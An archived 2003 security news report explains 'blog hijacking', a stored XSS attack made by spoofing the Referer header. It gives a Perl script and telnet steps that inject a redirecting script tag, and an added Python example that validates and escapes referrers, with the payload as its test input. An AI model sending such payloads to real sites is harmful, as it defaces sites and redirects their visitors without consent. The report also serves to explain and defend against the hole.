Rootsecure.net
The Security News Site For Systems Administrators & Hackers Wednesday, 23rd July 2014 @ 17:15:48 GMT 
Reports | Blog Hijacking
{17th Feb 2003}
Rootsecure.net recently came across this post: http://www.unix-girl.com/blog/archives/000726.html, on how it is possible to hijack blogs (along with any other site with similar insecure scripts), which was the inspiration for this report.

Referrer spoofing means changing the page that the site you go to thinks you came from. Normally, when you are on site A and click a link that takes you to site B, your browser sends site B the location of the page you were just on (site A). This has been possible ever since people started using home-grown insecure scripts on their pages (i.e. ones which do not properly filter out HTML characters such as < > " ' & ;). However, this is the first time Rootsecure.net has ever heard of the new phenomenon of "blog hijacking©": spoofing your referrer to a blog so that everyone else who visits it will be redirected to another blog/site of your choice. It is usually highly noticeable because most blogs display referrers on their home page.

The following Perl script can be used for such a purpose:

    #!/usr/bin/perl -w
    print "Content-Type: text/html\n\n";
    my $url = "http://www.example.com";
    use LWP::UserAgent;
    use HTTP::Request::Common qw(GET POST);
    my $agent = LWP::UserAgent->new;
    # GET request whose Referer header carries HTML/script instead of a URL
    my $req = GET $url, Referer => "\"></a><script>top.location.href=\'http://www.someotherblog.com\';</script><a href=\"http://localhost\"";
    #print $agent->request($req)->as_string;

However, by far the simpler way is to connect to the website via telnet, which should be readily available on any respectable computer.

  • Open a command window and type in telnet followed by the name of the site followed by 80, e.g.
    telnet www.example.com 80
    (do not include http://)
  • Type the following into the command window (after changing the Host field and the GET request). I would recommend copying the whole lot into Notepad, making the changes, then copy/pasting it into the command window.

    GET /index.pl HTTP/1.1
    Host: example.com
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Referer: http://"></a><script>top.location.href='http://www.someotherblog.com';</script><a href="http://localhost"
    (Note the referrer is all one line, and is spelt "Referer")


  • Hit enter twice (the one in the middle of the keyboard, not the one on the number pad)

Note: Other blogs will have implemented their referrer logging scripts in different ways, therefore care is needed to properly end/begin HTML tags.
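
The fix on the receiving side is to treat the Referer header as untrusted input when the referrer list is rendered. The following is an added example, not part of the original report or of any blog package: a Python sketch with hypothetical function names that shows an unfiltered renderer next to one that validates the URL and HTML-encodes it at output time, run against the Referer value shown above.

```python
import html
import re
from urllib.parse import urlsplit

# Hostnames limited to letters, digits, dots and hyphens.
HOST_RE = re.compile(r"[a-z0-9]([a-z0-9.-]*[a-z0-9])?")

# The Referer value from the report above, used here as test input.
HIJACK_REFERER = ("http://\"></a><script>top.location.href="
                  "'http://www.someotherblog.com';</script>"
                  "<a href=\"http://localhost\"")


def render_unsafe(referer):
    """What an unfiltered referrer list does: raw header into markup."""
    return '<li><a href="%s">%s</a></li>' % (referer, referer)


def render_safe(referer, max_len=200):
    """Return an <li> for a well-formed http(s) referrer, else None."""
    if not referer or len(referer) > max_len:
        return None
    try:
        parts = urlsplit(referer)
        host = parts.hostname or ""
    except ValueError:
        return None
    # Drop anything that is not an http(s) URL with a plain hostname.
    if parts.scheme not in ("http", "https") or not HOST_RE.fullmatch(host):
        return None
    # Encode at output time: & < > " ' become entities, so the value
    # cannot close the href attribute or open a new tag.
    safe = html.escape(referer, quote=True)
    return '<li><a href="%s" rel="nofollow">%s</a></li>' % (safe, safe)


if __name__ == "__main__":
    print(render_unsafe(HIJACK_REFERER))   # script tag reaches the page
    print(render_safe(HIJACK_REFERER))     # None: entry is dropped
    # Constructed input: valid host, markup hidden in the query string.
    print(render_safe('http://blog.example/?q="><script>x</script>'))
```

The hostname check drops the spoofed entry outright, and the encoding step covers referrers that pass validation but still carry markup in the path or query string.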

Update: Blog that was originally hijacked - http://jeremy.zawodny.com/blog/archives/000536.html
Roundup of "Blog-Hijacking" - http://www.notestips.com/80256B3A007F2692/1/NAMO-5KC2YN

Further Update: The Register have picked up the story.